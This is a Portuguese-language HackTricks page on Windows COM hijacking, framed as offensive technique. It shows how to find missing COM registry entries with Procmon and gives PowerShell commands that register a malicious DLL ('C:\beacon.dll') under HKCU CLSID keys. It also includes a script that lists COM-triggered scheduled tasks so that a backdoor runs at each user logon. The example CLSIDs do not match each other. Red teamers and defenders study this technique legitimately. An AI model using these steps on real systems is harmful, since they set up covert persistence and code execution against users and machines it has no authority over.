hacktricks/windows-hardening/windows-local-privilege-escalation/com-hijacking.md

5.5 KiB

Apropriação de COM

Aprenda hacking AWS do zero ao avançado com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

Pesquisando componentes COM inexistentes

Como os valores de HKCU podem ser modificados pelos usuários, a Apropriação de COM pode ser usada como um mecanismo persistente. Usando procmon, é fácil encontrar registros COM pesquisados que não existem e que um atacante poderia criar para persistir. Filtros:

  • Operações de RegOpenKey.
  • onde o Resultado é NOME NÃO ENCONTRADO.
  • e o Caminho termina com InprocServer32.

Depois de decidir qual COM inexistente impersoanar, execute os seguintes comandos. Tenha cuidado se decidir impersoanar um COM que é carregado a cada poucos segundos, pois isso pode ser excessivo.

New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"

Componentes COM do Agendador de Tarefas suscetíveis a sequestro

As Tarefas do Windows usam Acionadores Personalizados para chamar objetos COM e, como são executadas através do Agendador de Tarefas, é mais fácil prever quando serão acionadas.

# Mostrar CLSIDs COM
$Tarefas = Get-ScheduledTask

foreach ($Tarefa in $Tarefas)
{
if ($Tarefa.Actions.ClassId -ne $null)
{
if ($Tarefa.Triggers.Enabled -eq $true)
{
$usersSid = "S-1-5-32-545"
$grupoUsuarios = Get-LocalGroup | Where-Object { $_.SID -eq $usersSid }

if ($Tarefa.Principal.GroupId -eq $grupoUsuarios)
{
Write-Host "Nome da Tarefa: " $Tarefa.TaskName
Write-Host "Caminho da Tarefa: " $Tarefa.TaskPath
Write-Host "CLSID: " $Tarefa.Actions.ClassId
Write-Host
}
}
}
}

# Saída de Exemplo:
# Nome da Tarefa:  Exemplo
# Caminho da Tarefa:  \Microsoft\Windows\Exemplo\
# CLSID:  {1936ED8A-BD93-3213-E325-F38D112938E1}
# [mais como o anterior...]

Verificando a saída, você pode selecionar uma que será executada sempre que um usuário fizer login, por exemplo.

Agora, procurando pelo CLSID {1936ED8A-BD93-3213-E325-F38D112938EF} em HKEY_CLASSES_ROOT\CLSID e em HKLM e HKCU, geralmente você descobrirá que o valor não existe em HKCU.

# Exists in HKCR\CLSID\
Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"

Name           Property
----           --------
InprocServer32 (default)      : C:\Windows\system32\some.dll
ThreadingModel : Both

# Exists in HKLM
Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize

Name                                   Property
----                                   --------
{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler

# Doesn't exist in HKCU
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.

Então, você pode simplesmente criar a entrada HKCU e toda vez que o usuário fizer login, sua backdoor será acionada.

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks: